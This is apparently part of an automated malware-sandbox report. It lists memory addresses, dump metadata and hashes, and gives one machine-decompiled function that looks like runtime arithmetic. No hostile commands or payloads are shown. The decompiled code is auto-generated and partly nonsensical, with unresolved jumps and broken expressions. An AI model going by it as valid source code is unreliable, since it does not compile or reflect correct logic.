                                                                                                                                                                                                                                                        0x7ff6e5ad0a3a
                                                                                                                                                                                                                                                        0x7ff6e5ad0a47
                                                                                                                                                                                                                                                        0x7ff6e5ad0a59
                                                                                                                                                                                                                                                        0x7ff6e5ad0a5e
                                                                                                                                                                                                                                                        0x7ff6e5ad0a67
                                                                                                                                                                                                                                                        0x7ff6e5ad0a6e
                                                                                                                                                                                                                                                        0x7ff6e5ad0a73
                                                                                                                                                                                                                                                        0x7ff6e5ad0a84
                                                                                                                                                                                                                                                        0x7ff6e5ad0a8f
                                                                                                                                                                                                                                                        0x7ff6e5ad0a97
                                                                                                                                                                                                                                                        0x7ff6e5ad0aa0
                                                                                                                                                                                                                                                        0x7ff6e5ad0aa4
                                                                                                                                                                                                                                                        0x7ff6e5ad0aa9
                                                                                                                                                                                                                                                        0x7ff6e5ad0aad
                                                                                                                                                                                                                                                        0x7ff6e5ad0aaf
                                                                                                                                                                                                                                                        0x7ff6e5ad0ab6
                                                                                                                                                                                                                                                        0x7ff6e5ad0ab8
                                                                                                                                                                                                                                                        0x7ff6e5ad0abf
                                                                                                                                                                                                                                                        0x7ff6e5ad0ac1
                                                                                                                                                                                                                                                        0x7ff6e5ad0ac8
                                                                                                                                                                                                                                                        0x7ff6e5ad0ace
                                                                                                                                                                                                                                                        0x7ff6e5ad0ad2
                                                                                                                                                                                                                                                        0x7ff6e5ad0ad7
                                                                                                                                                                                                                                                        0x7ff6e5ad0add
                                                                                                                                                                                                                                                        0x7ff6e5ad0ae5
                                                                                                                                                                                                                                                        0x7ff6e5ad0af5
                                                                                                                                                                                                                                                        0x7ff6e5ad0afc
                                                                                                                                                                                                                                                        0x7ff6e5ad0aff
                                                                                                                                                                                                                                                        0x7ff6e5ad0b0a
                                                                                                                                                                                                                                                        0x7ff6e5ad0b17
                                                                                                                                                                                                                                                        0x7ff6e5ad0b30
                                                                                                                                                                                                                                                        0x7ff6e5ad0b40
                                                                                                                                                                                                                                                        0x7ff6e5ad0b4c
                                                                                                                                                                                                                                                        0x7ff6e5ad0b56
                                                                                                                                                                                                                                                        0x7ff6e5ad0b58
                                                                                                                                                                                                                                                        0x7ff6e5ad0b5f
                                                                                                                                                                                                                                                        0x7ff6e5ad0b65
                                                                                                                                                                                                                                                        0x7ff6e5ad0b6b
                                                                                                                                                                                                                                                        0x7ff6e5ad0b85
                                                                                                                                                                                                                                                        0x7ff6e5ad0b9b
                                                                                                                                                                                                                                                        0x7ff6e5ad0b9d
                                                                                                                                                                                                                                                        0x7ff6e5ad0ba2
                                                                                                                                                                                                                                                        0x7ff6e5ad0bb4
                                                                                                                                                                                                                                                        0x7ff6e5ad0bc4
                                                                                                                                                                                                                                                        0x7ff6e5ad0bc4
                                                                                                                                                                                                                                                        0x7ff6e5ad0bc8
                                                                                                                                                                                                                                                        0x7ff6e5ad0bd0
                                                                                                                                                                                                                                                        0x7ff6e5ad0bd6
                                                                                                                                                                                                                                                        0x7ff6e5ad0bd9
                                                                                                                                                                                                                                                        0x7ff6e5ad0be0
                                                                                                                                                                                                                                                        0x7ff6e5ad0be5
                                                                                                                                                                                                                                                        0x7ff6e5ad0bed
                                                                                                                                                                                                                                                        0x7ff6e5ad0bf6
                                                                                                                                                                                                                                                        0x7ff6e5ad0c04
                                                                                                                                                                                                                                                        0x7ff6e5ad0c06
                                                                                                                                                                                                                                                        0x7ff6e5ad0c0e
                                                                                                                                                                                                                                                        0x7ff6e5ad0c14
                                                                                                                                                                                                                                                        0x7ff6e5ad0c19
                                                                                                                                                                                                                                                        0x7ff6e5ad0c21
                                                                                                                                                                                                                                                        0x7ff6e5ad0c27
                                                                                                                                                                                                                                                        0x7ff6e5ad0c2a
                                                                                                                                                                                                                                                        0x7ff6e5ad0c38
                                                                                                                                                                                                                                                        0x7ff6e5ad0c3a
                                                                                                                                                                                                                                                        0x7ff6e5ad0c3f
                                                                                                                                                                                                                                                        0x7ff6e5ad0c45
                                                                                                                                                                                                                                                        0x7ff6e5ad0c4e
                                                                                                                                                                                                                                                        0x7ff6e5ad0c51
                                                                                                                                                                                                                                                        0x7ff6e5ad0c57
                                                                                                                                                                                                                                                        0x7ff6e5ad0c60
                                                                                                                                                                                                                                                        0x7ff6e5ad0c68
                                                                                                                                                                                                                                                        0x7ff6e5ad0c6d
                                                                                                                                                                                                                                                        0x7ff6e5ad0c77
                                                                                                                                                                                                                                                        0x7ff6e5ad0c79
                                                                                                                                                                                                                                                        0x7ff6e5ad0c7e
                                                                                                                                                                                                                                                        0x7ff6e5ad0c87
                                                                                                                                                                                                                                                        0x7ff6e5ad0c92
                                                                                                                                                                                                                                                        0x7ff6e5ad0c96
                                                                                                                                                                                                                                                        0x7ff6e5ad0c9b
                                                                                                                                                                                                                                                        0x7ff6e5ad0ca1
                                                                                                                                                                                                                                                        0x7ff6e5ad0ca6
                                                                                                                                                                                                                                                        0x7ff6e5ad0cab
                                                                                                                                                                                                                                                        0x7ff6e5ad0cb2
                                                                                                                                                                                                                                                        0x7ff6e5ad0cba
                                                                                                                                                                                                                                                        0x7ff6e5ad0cc1
                                                                                                                                                                                                                                                        0x7ff6e5ad0cc6
                                                                                                                                                                                                                                                        0x7ff6e5ad0cca
                                                                                                                                                                                                                                                        0x7ff6e5ad0ccd
                                                                                                                                                                                                                                                        0x7ff6e5ad0cd4
                                                                                                                                                                                                                                                        0x7ff6e5ad0cda
                                                                                                                                                                                                                                                        0x7ff6e5ad0cf3
                                                                                                                                                                                                                                                        0x7ff6e5ad0d18
                                                                                                                                                                                                                                                        0x7ff6e5ad0d21
                                                                                                                                                                                                                                                        0x7ff6e5ad0d30
                                                                                                                                                                                                                                                        0x7ff6e5ad0d39
                                                                                                                                                                                                                                                        0x7ff6e5ad0d3c
                                                                                                                                                                                                                                                        0x7ff6e5ad0d41
                                                                                                                                                                                                                                                        0x7ff6e5ad0d47
                                                                                                                                                                                                                                                        0x7ff6e5ad0d4c
                                                                                                                                                                                                                                                        0x7ff6e5ad0d58
                                                                                                                                                                                                                                                        0x7ff6e5ad0d5d
                                                                                                                                                                                                                                                        0x7ff6e5ad0d8d

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2227656907-0
                                                                                                                                                                                                                                                        • Opcode ID: a75c328deda16e505f11be5999d53bccbb439aa7087c070fc199351b3ba57079
                                                                                                                                                                                                                                                        • Instruction ID: 3f39cb33a88e5fe582dae4c983bce84bfa826158fcf70dfa62ec0ec66472d570
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a75c328deda16e505f11be5999d53bccbb439aa7087c070fc199351b3ba57079
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 81B1C323B1968641EA60AB2994243B96390FF44FE8F444531ED5DCBB95EF3DEC41CB09
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 70%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AD2D30(signed int* __rcx, signed int __rdx, signed int __r10, long long __r13, signed int _a8, long long _a16, signed int _a24, signed int _a32) {
                                                                                                                                                                                                                                                        				long long _v64;
                                                                                                                                                                                                                                                        				void* _v532;
                                                                                                                                                                                                                                                        				intOrPtr _v536;
                                                                                                                                                                                                                                                        				signed long long _v544;
                                                                                                                                                                                                                                                        				signed int _v552;
                                                                                                                                                                                                                                                        				signed long long _v560;
                                                                                                                                                                                                                                                        				signed int _v564;
                                                                                                                                                                                                                                                        				signed int _v568;
                                                                                                                                                                                                                                                        				void* __rbx;
                                                                                                                                                                                                                                                        				void* __rsi;
                                                                                                                                                                                                                                                        				signed int _t156;
                                                                                                                                                                                                                                                        				signed int _t174;
                                                                                                                                                                                                                                                        				signed int _t189;
                                                                                                                                                                                                                                                        				signed int _t206;
                                                                                                                                                                                                                                                        				signed int _t208;
                                                                                                                                                                                                                                                        				signed int _t227;
                                                                                                                                                                                                                                                        				void* _t244;
                                                                                                                                                                                                                                                        				void* _t251;
                                                                                                                                                                                                                                                        				signed long long _t256;
                                                                                                                                                                                                                                                        				void* _t268;
                                                                                                                                                                                                                                                        				signed long long _t269;
                                                                                                                                                                                                                                                        				signed int* _t271;
                                                                                                                                                                                                                                                        				intOrPtr* _t277;
                                                                                                                                                                                                                                                        				signed long long _t280;
                                                                                                                                                                                                                                                        				signed long long _t283;
                                                                                                                                                                                                                                                        				signed long long _t285;
                                                                                                                                                                                                                                                        				signed long long _t287;
                                                                                                                                                                                                                                                        				signed long long _t289;
                                                                                                                                                                                                                                                        				void* _t290;
                                                                                                                                                                                                                                                        				signed int _t293;
                                                                                                                                                                                                                                                        				signed long long _t295;
                                                                                                                                                                                                                                                        				signed int _t302;
                                                                                                                                                                                                                                                        				signed int _t305;
                                                                                                                                                                                                                                                        				signed long long _t306;
                                                                                                                                                                                                                                                        				void* _t312;
                                                                                                                                                                                                                                                        				signed int _t314;
                                                                                                                                                                                                                                                        				signed long long _t316;
                                                                                                                                                                                                                                                        				void* _t323;
                                                                                                                                                                                                                                                        				signed long long _t334;
                                                                                                                                                                                                                                                        				long long _t335;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t335 = __r13;
                                                                                                                                                                                                                                                        				_a16 = __rdx;
                                                                                                                                                                                                                                                        				r10d =  *__rcx;
                                                                                                                                                                                                                                                        				if (r10d == 0) goto 0xe5ad31b8;
                                                                                                                                                                                                                                                        				if ( *__rdx == 0) goto 0xe5ad31b8;
                                                                                                                                                                                                                                                        				r10d = r10d - 1;
                                                                                                                                                                                                                                                        				_t2 = _t290 - 1; // 0x435
                                                                                                                                                                                                                                                        				if (_t2 != 0) goto 0xe5ad2e6b;
                                                                                                                                                                                                                                                        				r12d =  *(__rdx + 4);
                                                                                                                                                                                                                                                        				if (r12d != 1) goto 0xe5ad2da2;
                                                                                                                                                                                                                                                        				_t271 =  &(__rcx[1]);
                                                                                                                                                                                                                                                        				 *__rcx = 0;
                                                                                                                                                                                                                                                        				r9d = 0;
                                                                                                                                                                                                                                                        				_v536 = 0;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AD445C(_t251, _t268, _t271, __rdx, __rcx,  &_v532, _t312);
                                                                                                                                                                                                                                                        				goto 0xe5ad31ba;
                                                                                                                                                                                                                                                        				if (r10d != 0) goto 0xe5ad2de4;
                                                                                                                                                                                                                                                        				_t208 = _t271[1];
                                                                                                                                                                                                                                                        				 *_t271 = 0;
                                                                                                                                                                                                                                                        				r9d = 0;
                                                                                                                                                                                                                                                        				_v536 = 0;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AD445C(_t251, _t268,  &(_t271[1]), __rdx, __rcx,  &_v532, _t312);
                                                                                                                                                                                                                                                        				_t189 = _t208 % r12d;
                                                                                                                                                                                                                                                        				__rcx[1] = _t189;
                                                                                                                                                                                                                                                        				bpl = _t189 != 0;
                                                                                                                                                                                                                                                        				 *__rcx = 0;
                                                                                                                                                                                                                                                        				goto 0xe5ad31ba;
                                                                                                                                                                                                                                                        				r15d = 0xffffffff;
                                                                                                                                                                                                                                                        				if (r10d == r15d) goto 0xe5ad2e30;
                                                                                                                                                                                                                                                        				r8d =  *(__rcx + 4 + __r10 * 4);
                                                                                                                                                                                                                                                        				r10d = r10d + r15d;
                                                                                                                                                                                                                                                        				_t174 = _t208 / r12d / _t334;
                                                                                                                                                                                                                                                        				_t293 = __rdx;
                                                                                                                                                                                                                                                        				if (r10d != r15d) goto 0xe5ad2e00;
                                                                                                                                                                                                                                                        				r9d = 0;
                                                                                                                                                                                                                                                        				_v536 = 0;
                                                                                                                                                                                                                                                        				_t302 =  &_v532;
                                                                                                                                                                                                                                                        				 *__rcx = 0;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AD445C( &_v532 | _t295 << 0x00000020, _t268,  &(__rcx[1]), __rdx, __rcx, _t302, _t334);
                                                                                                                                                                                                                                                        				__rcx[1] = _t208;
                                                                                                                                                                                                                                                        				__rcx[2] = _t174;
                                                                                                                                                                                                                                                        				bpl = _t174 != 0;
                                                                                                                                                                                                                                                        				 *__rcx = 1;
                                                                                                                                                                                                                                                        				goto 0xe5ad31ba;
                                                                                                                                                                                                                                                        				if (1 - r10d > 0) goto 0xe5ad31b8;
                                                                                                                                                                                                                                                        				r8d = r10d;
                                                                                                                                                                                                                                                        				_t285 = r10d;
                                                                                                                                                                                                                                                        				r8d = r8d - 1;
                                                                                                                                                                                                                                                        				r9d = r10d;
                                                                                                                                                                                                                                                        				_t269 = r8d;
                                                                                                                                                                                                                                                        				if (_t285 - _t269 < 0) goto 0xe5ad2ed1;
                                                                                                                                                                                                                                                        				_t277 = (__rdx >> 0x20) + 4 + _t285 * 4;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(__rdx - _t269 * 4 - __rcx + _t277)) !=  *_t277) goto 0xe5ad2eba;
                                                                                                                                                                                                                                                        				r9d = r9d - 1;
                                                                                                                                                                                                                                                        				if (_t285 - 1 - _t269 >= 0) goto 0xe5ad2ea1;
                                                                                                                                                                                                                                                        				goto 0xe5ad2ed1;
                                                                                                                                                                                                                                                        				_t287 = r9d - r8d;
                                                                                                                                                                                                                                                        				_t256 = r9d;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(__rdx + 4 + _t287 * 4)) -  *(__rcx + 4 + _t256 * 4) >= 0) goto 0xe5ad2ed4;
                                                                                                                                                                                                                                                        				r8d = r8d + 1;
                                                                                                                                                                                                                                                        				_t227 = r8d;
                                                                                                                                                                                                                                                        				if (_t227 == 0) goto 0xe5ad31b8;
                                                                                                                                                                                                                                                        				r9d =  *(__rdx + 4 + _t295 * 4);
                                                                                                                                                                                                                                                        				_t48 = _t293 - 2; // 0x434
                                                                                                                                                                                                                                                        				r11d =  *(__rdx + 4 + _t256 * 4);
                                                                                                                                                                                                                                                        				asm("inc ecx");
                                                                                                                                                                                                                                                        				_a24 = r11d;
                                                                                                                                                                                                                                                        				if (_t227 == 0) goto 0xe5ad2f18;
                                                                                                                                                                                                                                                        				r14d = 0x20;
                                                                                                                                                                                                                                                        				r14d = r14d - 0x1f;
                                                                                                                                                                                                                                                        				_a8 = r14d;
                                                                                                                                                                                                                                                        				if (0x1f - _t48 == 0) goto 0xe5ad2f64;
                                                                                                                                                                                                                                                        				goto 0xe5ad2f27;
                                                                                                                                                                                                                                                        				_a8 = 0;
                                                                                                                                                                                                                                                        				r14d = 0;
                                                                                                                                                                                                                                                        				r9d = r11d >> r14d;
                                                                                                                                                                                                                                                        				r11d = r11d << 0x20;
                                                                                                                                                                                                                                                        				r9d = r9d | r9d << 0x00000020;
                                                                                                                                                                                                                                                        				_a24 = r11d;
                                                                                                                                                                                                                                                        				if (_t208 - 2 <= 0) goto 0xe5ad2f64;
                                                                                                                                                                                                                                                        				r11d = r11d |  *(__rdx + 4 + _t256 * 4) >> r14d;
                                                                                                                                                                                                                                                        				_a24 = r11d;
                                                                                                                                                                                                                                                        				r12d = _t302 - 1;
                                                                                                                                                                                                                                                        				_v552 = _t295;
                                                                                                                                                                                                                                                        				if (r12d < 0) goto 0xe5ad3179;
                                                                                                                                                                                                                                                        				r15d = 0xffffffff;
                                                                                                                                                                                                                                                        				_v544 = _t256;
                                                                                                                                                                                                                                                        				_v64 = __r13;
                                                                                                                                                                                                                                                        				r13d = _t334 + __rdx;
                                                                                                                                                                                                                                                        				_v560 = _t256;
                                                                                                                                                                                                                                                        				if (r13d - r10d > 0) goto 0xe5ad2fac;
                                                                                                                                                                                                                                                        				goto 0xe5ad2fae;
                                                                                                                                                                                                                                                        				_a32 = 0;
                                                                                                                                                                                                                                                        				r11d =  *(__rcx + 4 + _t256 * 4);
                                                                                                                                                                                                                                                        				_v568 = _t277 - 4;
                                                                                                                                                                                                                                                        				_v564 = 0;
                                                                                                                                                                                                                                                        				if (0x20 == 0) goto 0xe5ad3006;
                                                                                                                                                                                                                                                        				r8d = r11d;
                                                                                                                                                                                                                                                        				r11d = r11d << 0x20;
                                                                                                                                                                                                                                                        				if (r13d - 3 < 0) goto 0xe5ad300b;
                                                                                                                                                                                                                                                        				_t156 =  *(__rcx + 4 + (_v568 << 0x20) * 4) >> r14d;
                                                                                                                                                                                                                                                        				r11d = r11d | _t156;
                                                                                                                                                                                                                                                        				goto 0xe5ad300b;
                                                                                                                                                                                                                                                        				_t305 = _v568;
                                                                                                                                                                                                                                                        				_t280 = _v560;
                                                                                                                                                                                                                                                        				_t314 = _t305;
                                                                                                                                                                                                                                                        				r8d = _t156 / _t280 % _t280;
                                                                                                                                                                                                                                                        				if (_t314 - __rdx <= 0) goto 0xe5ad3042;
                                                                                                                                                                                                                                                        				_t306 = _t305 + 0x1;
                                                                                                                                                                                                                                                        				if (_t306 - __rdx > 0) goto 0xe5ad3085;
                                                                                                                                                                                                                                                        				asm("o16 nop [eax+eax]");
                                                                                                                                                                                                                                                        				_t283 = _t306 << 0x00000020 | _t295;
                                                                                                                                                                                                                                                        				if (0x1 - _t283 <= 0) goto 0xe5ad307d;
                                                                                                                                                                                                                                                        				_t316 = __rdx - 1;
                                                                                                                                                                                                                                                        				if (_t306 + _t280 - __rdx <= 0) goto 0xe5ad3060;
                                                                                                                                                                                                                                                        				r14d = _a8;
                                                                                                                                                                                                                                                        				if (_t316 == 0) goto 0xe5ad3150;
                                                                                                                                                                                                                                                        				r11d = 0;
                                                                                                                                                                                                                                                        				if (_t208 == 0) goto 0xe5ad30fc;
                                                                                                                                                                                                                                                        				r15d = _a8;
                                                                                                                                                                                                                                                        				r8d = r10d;
                                                                                                                                                                                                                                                        				_t323 =  >=  ? _t295 + 0x1 >> 0x20 : (_t295 + 0x1 >> 0x20) + 1;
                                                                                                                                                                                                                                                        				r11d = r11d + 1;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(__rcx + 4 + _t283 * 4)) = __rcx[0xffffffff00000002] - r8d;
                                                                                                                                                                                                                                                        				if (r11d - _t208 < 0) goto 0xe5ad30b0;
                                                                                                                                                                                                                                                        				r14d = r15d;
                                                                                                                                                                                                                                                        				_a8 = r15d;
                                                                                                                                                                                                                                                        				r15d = 0xffffffff;
                                                                                                                                                                                                                                                        				if (0x1 - _t323 >= 0) goto 0xe5ad314c;
                                                                                                                                                                                                                                                        				r10d = 0;
                                                                                                                                                                                                                                                        				if (_t208 == 0) goto 0xe5ad3149;
                                                                                                                                                                                                                                                        				r10d = r10d + 1;
                                                                                                                                                                                                                                                        				_t289 =  &(__rcx[0xffffffff00000001]);
                                                                                                                                                                                                                                                        				 *(_t289 + 4) = r8d;
                                                                                                                                                                                                                                                        				_t244 = r10d - _t208;
                                                                                                                                                                                                                                                        				if (_t244 < 0) goto 0xe5ad3120;
                                                                                                                                                                                                                                                        				_t120 = _t335 - 1; // 0x0
                                                                                                                                                                                                                                                        				r10d = _t120;
                                                                                                                                                                                                                                                        				r13d = r13d - 1;
                                                                                                                                                                                                                                                        				r12d = r12d - 1;
                                                                                                                                                                                                                                                        				_v552 = (_v552 << 0x20) + 0x1;
                                                                                                                                                                                                                                                        				if (_t244 >= 0) goto 0xe5ad2fa0;
                                                                                                                                                                                                                                                        				r10d = r10d + 1;
                                                                                                                                                                                                                                                        				if (r10d -  *__rcx >= 0) goto 0xe5ad3190;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(__rcx + 4 + ((0x1 + _t314) * _t280 * __rdx - _t287) * _t316 * 4)) = 0;
                                                                                                                                                                                                                                                        				if (r10d + 1 -  *__rcx < 0) goto 0xe5ad3184;
                                                                                                                                                                                                                                                        				 *__rcx = r10d;
                                                                                                                                                                                                                                                        				if (r10d == 0) goto 0xe5ad31b3;
                                                                                                                                                                                                                                                        				_t206 = _t323 - 1;
                                                                                                                                                                                                                                                        				r10d = _t206;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(__rcx + 4 + _t289 * 4)) != 0) goto 0xe5ad31b3;
                                                                                                                                                                                                                                                        				 *__rcx = _t206;
                                                                                                                                                                                                                                                        				if (_t206 != 0) goto 0xe5ad31a0;
                                                                                                                                                                                                                                                        				goto 0xe5ad31ba;
                                                                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                                                                        			}











































                                                                                                                                                                                                                                                        0x7ff6e5ad2d30
                                                                                                                                                                                                                                                        0x7ff6e5ad2d30
                                                                                                                                                                                                                                                        0x7ff6e5ad2d46
                                                                                                                                                                                                                                                        0x7ff6e5ad2d52
                                                                                                                                                                                                                                                        0x7ff6e5ad2d5c
                                                                                                                                                                                                                                                        0x7ff6e5ad2d62
                                                                                                                                                                                                                                                        0x7ff6e5ad2d65
                                                                                                                                                                                                                                                        0x7ff6e5ad2d6a
                                                                                                                                                                                                                                                        0x7ff6e5ad2d70
                                                                                                                                                                                                                                                        0x7ff6e5ad2d7a
                                                                                                                                                                                                                                                        0x7ff6e5ad2d84
                                                                                                                                                                                                                                                        0x7ff6e5ad2d88
                                                                                                                                                                                                                                                        0x7ff6e5ad2d8a
                                                                                                                                                                                                                                                        0x7ff6e5ad2d8d
                                                                                                                                                                                                                                                        0x7ff6e5ad2d96
                                                                                                                                                                                                                                                        0x7ff6e5ad2d9d
                                                                                                                                                                                                                                                        0x7ff6e5ad2da5
                                                                                                                                                                                                                                                        0x7ff6e5ad2da7
                                                                                                                                                                                                                                                        0x7ff6e5ad2daf
                                                                                                                                                                                                                                                        0x7ff6e5ad2db1
                                                                                                                                                                                                                                                        0x7ff6e5ad2db8
                                                                                                                                                                                                                                                        0x7ff6e5ad2dc1
                                                                                                                                                                                                                                                        0x7ff6e5ad2dca
                                                                                                                                                                                                                                                        0x7ff6e5ad2dd1
                                                                                                                                                                                                                                                        0x7ff6e5ad2dd4
                                                                                                                                                                                                                                                        0x7ff6e5ad2ddd
                                                                                                                                                                                                                                                        0x7ff6e5ad2ddf
                                                                                                                                                                                                                                                        0x7ff6e5ad2de4
                                                                                                                                                                                                                                                        0x7ff6e5ad2df3
                                                                                                                                                                                                                                                        0x7ff6e5ad2e00
                                                                                                                                                                                                                                                        0x7ff6e5ad2e0b
                                                                                                                                                                                                                                                        0x7ff6e5ad2e1d
                                                                                                                                                                                                                                                        0x7ff6e5ad2e28
                                                                                                                                                                                                                                                        0x7ff6e5ad2e2e
                                                                                                                                                                                                                                                        0x7ff6e5ad2e30
                                                                                                                                                                                                                                                        0x7ff6e5ad2e33
                                                                                                                                                                                                                                                        0x7ff6e5ad2e37
                                                                                                                                                                                                                                                        0x7ff6e5ad2e3c
                                                                                                                                                                                                                                                        0x7ff6e5ad2e47
                                                                                                                                                                                                                                                        0x7ff6e5ad2e4f
                                                                                                                                                                                                                                                        0x7ff6e5ad2e5b
                                                                                                                                                                                                                                                        0x7ff6e5ad2e5e
                                                                                                                                                                                                                                                        0x7ff6e5ad2e64
                                                                                                                                                                                                                                                        0x7ff6e5ad2e66
                                                                                                                                                                                                                                                        0x7ff6e5ad2e6e
                                                                                                                                                                                                                                                        0x7ff6e5ad2e74
                                                                                                                                                                                                                                                        0x7ff6e5ad2e77
                                                                                                                                                                                                                                                        0x7ff6e5ad2e7a
                                                                                                                                                                                                                                                        0x7ff6e5ad2e7d
                                                                                                                                                                                                                                                        0x7ff6e5ad2e80
                                                                                                                                                                                                                                                        0x7ff6e5ad2e86
                                                                                                                                                                                                                                                        0x7ff6e5ad2e9d
                                                                                                                                                                                                                                                        0x7ff6e5ad2ea7
                                                                                                                                                                                                                                                        0x7ff6e5ad2ea9
                                                                                                                                                                                                                                                        0x7ff6e5ad2eb6
                                                                                                                                                                                                                                                        0x7ff6e5ad2eb8
                                                                                                                                                                                                                                                        0x7ff6e5ad2ec0
                                                                                                                                                                                                                                                        0x7ff6e5ad2ec3
                                                                                                                                                                                                                                                        0x7ff6e5ad2ecf
                                                                                                                                                                                                                                                        0x7ff6e5ad2ed1
                                                                                                                                                                                                                                                        0x7ff6e5ad2ed4
                                                                                                                                                                                                                                                        0x7ff6e5ad2ed7
                                                                                                                                                                                                                                                        0x7ff6e5ad2edd
                                                                                                                                                                                                                                                        0x7ff6e5ad2ee2
                                                                                                                                                                                                                                                        0x7ff6e5ad2ee5
                                                                                                                                                                                                                                                        0x7ff6e5ad2eec
                                                                                                                                                                                                                                                        0x7ff6e5ad2ef0
                                                                                                                                                                                                                                                        0x7ff6e5ad2ef8
                                                                                                                                                                                                                                                        0x7ff6e5ad2eff
                                                                                                                                                                                                                                                        0x7ff6e5ad2f07
                                                                                                                                                                                                                                                        0x7ff6e5ad2f0a
                                                                                                                                                                                                                                                        0x7ff6e5ad2f14
                                                                                                                                                                                                                                                        0x7ff6e5ad2f16
                                                                                                                                                                                                                                                        0x7ff6e5ad2f1d
                                                                                                                                                                                                                                                        0x7ff6e5ad2f24
                                                                                                                                                                                                                                                        0x7ff6e5ad2f36
                                                                                                                                                                                                                                                        0x7ff6e5ad2f39
                                                                                                                                                                                                                                                        0x7ff6e5ad2f3c
                                                                                                                                                                                                                                                        0x7ff6e5ad2f3f
                                                                                                                                                                                                                                                        0x7ff6e5ad2f4a
                                                                                                                                                                                                                                                        0x7ff6e5ad2f59
                                                                                                                                                                                                                                                        0x7ff6e5ad2f5c
                                                                                                                                                                                                                                                        0x7ff6e5ad2f64
                                                                                                                                                                                                                                                        0x7ff6e5ad2f68
                                                                                                                                                                                                                                                        0x7ff6e5ad2f73
                                                                                                                                                                                                                                                        0x7ff6e5ad2f7c
                                                                                                                                                                                                                                                        0x7ff6e5ad2f82
                                                                                                                                                                                                                                                        0x7ff6e5ad2f8a
                                                                                                                                                                                                                                                        0x7ff6e5ad2f92
                                                                                                                                                                                                                                                        0x7ff6e5ad2f96
                                                                                                                                                                                                                                                        0x7ff6e5ad2fa3
                                                                                                                                                                                                                                                        0x7ff6e5ad2faa
                                                                                                                                                                                                                                                        0x7ff6e5ad2fae
                                                                                                                                                                                                                                                        0x7ff6e5ad2fc1
                                                                                                                                                                                                                                                        0x7ff6e5ad2fc6
                                                                                                                                                                                                                                                        0x7ff6e5ad2fcb
                                                                                                                                                                                                                                                        0x7ff6e5ad2fd1
                                                                                                                                                                                                                                                        0x7ff6e5ad2fd8
                                                                                                                                                                                                                                                        0x7ff6e5ad2feb
                                                                                                                                                                                                                                                        0x7ff6e5ad2ff2
                                                                                                                                                                                                                                                        0x7ff6e5ad2fff
                                                                                                                                                                                                                                                        0x7ff6e5ad3001
                                                                                                                                                                                                                                                        0x7ff6e5ad3004
                                                                                                                                                                                                                                                        0x7ff6e5ad3006
                                                                                                                                                                                                                                                        0x7ff6e5ad300b
                                                                                                                                                                                                                                                        0x7ff6e5ad301a
                                                                                                                                                                                                                                                        0x7ff6e5ad3023
                                                                                                                                                                                                                                                        0x7ff6e5ad3029
                                                                                                                                                                                                                                                        0x7ff6e5ad303f
                                                                                                                                                                                                                                                        0x7ff6e5ad3045
                                                                                                                                                                                                                                                        0x7ff6e5ad3057
                                                                                                                                                                                                                                                        0x7ff6e5ad3067
                                                                                                                                                                                                                                                        0x7ff6e5ad306d
                                                                                                                                                                                                                                                        0x7ff6e5ad306f
                                                                                                                                                                                                                                                        0x7ff6e5ad307b
                                                                                                                                                                                                                                                        0x7ff6e5ad307d
                                                                                                                                                                                                                                                        0x7ff6e5ad3088
                                                                                                                                                                                                                                                        0x7ff6e5ad3091
                                                                                                                                                                                                                                                        0x7ff6e5ad3096
                                                                                                                                                                                                                                                        0x7ff6e5ad30a0
                                                                                                                                                                                                                                                        0x7ff6e5ad30c2
                                                                                                                                                                                                                                                        0x7ff6e5ad30d8
                                                                                                                                                                                                                                                        0x7ff6e5ad30df
                                                                                                                                                                                                                                                        0x7ff6e5ad30e2
                                                                                                                                                                                                                                                        0x7ff6e5ad30e9
                                                                                                                                                                                                                                                        0x7ff6e5ad30eb
                                                                                                                                                                                                                                                        0x7ff6e5ad30ee
                                                                                                                                                                                                                                                        0x7ff6e5ad30f6
                                                                                                                                                                                                                                                        0x7ff6e5ad3112
                                                                                                                                                                                                                                                        0x7ff6e5ad3114
                                                                                                                                                                                                                                                        0x7ff6e5ad3119
                                                                                                                                                                                                                                                        0x7ff6e5ad3124
                                                                                                                                                                                                                                                        0x7ff6e5ad312b
                                                                                                                                                                                                                                                        0x7ff6e5ad313c
